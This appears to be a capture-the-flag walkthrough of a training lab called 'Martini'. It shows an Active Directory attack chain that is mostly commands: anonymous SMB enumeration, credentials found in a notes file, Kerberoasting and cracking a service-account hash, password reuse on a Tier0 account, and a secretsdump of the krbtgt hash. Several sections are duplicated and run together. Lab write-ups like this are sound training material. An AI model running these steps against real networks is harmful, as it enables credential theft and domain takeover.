May 15, 2026
Hack Smarter: Martini
This is a walkthrough of the Martini back in Hack Smarter:
Ryan Yager
Author
nxc smb 10.0.28.180 -u anonymous -p '' --shares --usersnxc smb 10.0.28.180 -u anonymous -p '' --shares --userssmbclient //10.0.28.180/notessmbclient //10.0.28.180/notes
get notes.txt
exit
cat notes.txt
- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
mprice:*martini*
impacket-GetUserSPNs DRY.MARTINI.BARS/'mprice:*martini*' -request
echo '$krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS$DRY.MARTINI.BARS/ATHENA_SVC*$b3bc25adfdea6097fb4a35bc49540c23$b35231ffb91e595eebeca098a1b2963e2f119778cae75b21691ced5dbcaad895f39c5d6d8f411fee541b27abc53b812b6a67818d7956cd04e377772fb360919e10aa4f6866a801a341d96bdb62e9fd37363742bab2d620834358e6e69c92a813b53eb6865464b6e9a579034c55d99aee4bcaba93d27460228e69ff17581033c8a8bbb1e3ec6e83e54fd1bf04f3c39a8a11566d19ce48c4703489e65db2c536344c8d0db5088e2d8389ce997563d9aab57cf24971bb238e98d1937859dbf1f54cc4cde601a396fd97b4e795537aec0818726df42ad07de38420bbef1d6d6c3abfe73159f8b5c2bc195e4311217a7d576304d4cd606c3490cdccb348a7fedff44e3fcb88f06a08edcfcf30a8943ab666673dc0a3750545d5f75fac9ea6cd47b5b0365aa25a9e813ac635ed7d608fe78c633b178270c8c878f5a224c5e157c9cd8689af8a675383c626550bf61afec59a317f37c93781701e5e83ed1a51b66dbdcd401492bcba8badb91b708f6f32d9d229e07ce3b19e82211305e32e6413cadeaf5f8ff0c85f8a8fe89a7fee76c6bb672b5b97735707735efd0b67eaaa492f634e11776f5297798cb8cc8de69ec53787d0433df80b3d2bf14cd0708723a455900bc973857aecde24b053127276b5813ff876030fd88b0f575f4eaf2f5e57739b5662a0470b60fe067daf45515e6b95f71203a9948102229d348caca47df0b13c9e1374cf787d230c207026677633a0938d7e03f2ed12737ac00d088db9386960c2ebd011c46752a3ef357c40c2c73bee3ebc0ee394b3f98e3d4a866a34f49afd4198bf6b80896823a51fdc98ceea433bd28dbeeacf6681d1127e83cadf0b1f3b7eca4022b4db6f9236d3361e8999e1a4881e7c37b9f225a4edf49cd342ae2b980da73b1b50f3427ca8a5d36e711f7879ec9356909a99ac69897190d7981a6532829c06990e6e8a74dfdccb6cf9f392598f061ff06fb06fcacba0f3cdc676fd10c3d3ad139e46607b5b578bdb66c758a9daa140622798597972037a858879cb8dbc31854f8e81db48b7efc05472e432f33d0afbc66592feaa5ccc746582d674eb0be423a14070942afae9570252bbd9d1bef2d84393d21ec185586518eec8ff322a06bd6c6adf020c4b98db572d38fc5f200915c9d35df761b1d65b7c2fdf17f6c96bad0e0b8aa8921ad716b49ad788419f328fd1bcf34a3435dc5fe7d96e8bcac0ecba7013ebf2f7b77cc72cb6f05ee60546961aa3cc3678209ca99af7db32b753c3633490fb59653ac8a048a5a5e77a5e04f46c0c76abd979eab2e3055b81e6a074559da7c31bc27db49fa3eccdb8e082b21daa109b773682f4370fe1101c6c321c1ef8f85c1648ac18edc835c26646caef174ab7fd2acddab218f4a1d1ffc4d4deab489188172d213310e2f074e1e3c894d1bb02c5581ee12c09620fc185246fe3b819743ba6d584216fedc7e0da1b9d7ecebfd8b1c202f1fb8ea11fb7b9b6c9f409b6250b4e18c1fed531ea3740af' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
nxc smb 10.0.28.180 -u athena_svc -p 1dirtymartini --shares --usersget notes.txt
exit
cat notes.txt
- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint
creds
mprice:*martini*
impacket-GetUserSPNs DRY.MARTINI.BARS/'mprice:*martini*' -request
echo '$krb5tgs$23$*ATHENA_SVC$DRY.MARTINI.BARS$DRY.MARTINI.BARS/ATHENA_SVC*$b3bc25adfdea6097fb4a35bc49540c23$b35231ffb91e595eebeca098a1b2963e2f119778cae75b21691ced5dbcaad895f39c5d6d8f411fee541b27abc53b812b6a67818d7956cd04e377772fb360919e10aa4f6866a801a341d96bdb62e9fd37363742bab2d620834358e6e69c92a813b53eb6865464b6e9a579034c55d99aee4bcaba93d27460228e69ff17581033c8a8bbb1e3ec6e83e54fd1bf04f3c39a8a11566d19ce48c4703489e65db2c536344c8d0db5088e2d8389ce997563d9aab57cf24971bb238e98d1937859dbf1f54cc4cde601a396fd97b4e795537aec0818726df42ad07de38420bbef1d6d6c3abfe73159f8b5c2bc195e4311217a7d576304d4cd606c3490cdccb348a7fedff44e3fcb88f06a08edcfcf30a8943ab666673dc0a3750545d5f75fac9ea6cd47b5b0365aa25a9e813ac635ed7d608fe78c633b178270c8c878f5a224c5e157c9cd8689af8a675383c626550bf61afec59a317f37c93781701e5e83ed1a51b66dbdcd401492bcba8badb91b708f6f32d9d229e07ce3b19e82211305e32e6413cadeaf5f8ff0c85f8a8fe89a7fee76c6bb672b5b97735707735efd0b67eaaa492f634e11776f5297798cb8cc8de69ec53787d0433df80b3d2bf14cd0708723a455900bc973857aecde24b053127276b5813ff876030fd88b0f575f4eaf2f5e57739b5662a0470b60fe067daf45515e6b95f71203a9948102229d348caca47df0b13c9e1374cf787d230c207026677633a0938d7e03f2ed12737ac00d088db9386960c2ebd011c46752a3ef357c40c2c73bee3ebc0ee394b3f98e3d4a866a34f49afd4198bf6b80896823a51fdc98ceea433bd28dbeeacf6681d1127e83cadf0b1f3b7eca4022b4db6f9236d3361e8999e1a4881e7c37b9f225a4edf49cd342ae2b980da73b1b50f3427ca8a5d36e711f7879ec9356909a99ac69897190d7981a6532829c06990e6e8a74dfdccb6cf9f392598f061ff06fb06fcacba0f3cdc676fd10c3d3ad139e46607b5b578bdb66c758a9daa140622798597972037a858879cb8dbc31854f8e81db48b7efc05472e432f33d0afbc66592feaa5ccc746582d674eb0be423a14070942afae9570252bbd9d1bef2d84393d21ec185586518eec8ff322a06bd6c6adf020c4b98db572d38fc5f200915c9d35df761b1d65b7c2fdf17f6c96bad0e0b8aa8921ad716b49ad788419f328fd1bcf34a3435dc5fe7d96e8bcac0ecba7013ebf2f7b77cc72cb6f05ee60546961aa3cc3678209ca99af7db32b753c3633490fb59653ac8a048a5a5e77a5e04f46c0c76abd979eab2e3055b81e6a074559da7c31bc27db49fa3eccdb8e082b21daa109b773682f4370fe1101c6c321c1ef8f85c1648ac18edc835c26646caef174ab7fd2acddab218f4a1d1ffc4d4deab489188172d213310e2f074e1e3c894d1bb02c5581ee12c09620fc185246fe3b819743ba6d584216fedc7e0da1b9d7ecebfd8b1c202f1fb8ea11fb7b9b6c9f409b6250b4e18c1fed531ea3740af' > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
nxc smb 10.0.28.180 -u athena_svc -p 1dirtymartini --shares --usersWe will see athena_svc and also a Tier0 user called athena, they may share the same password
nxc smb 10.0.28.180 -u athena.t0 -p 1dirtymartini
impacket-secretsdump 'DRY.MARTINI.BARS/athena.t0:1dirtymartini'@10.0.28.180 -just-dc-user krbtgtnxc smb 10.0.28.180 -u athena.t0 -p 1dirtymartini
impacket-secretsdump 'DRY.MARTINI.BARS/athena.t0:1dirtymartini'@10.0.28.180 -just-dc-user krbtgt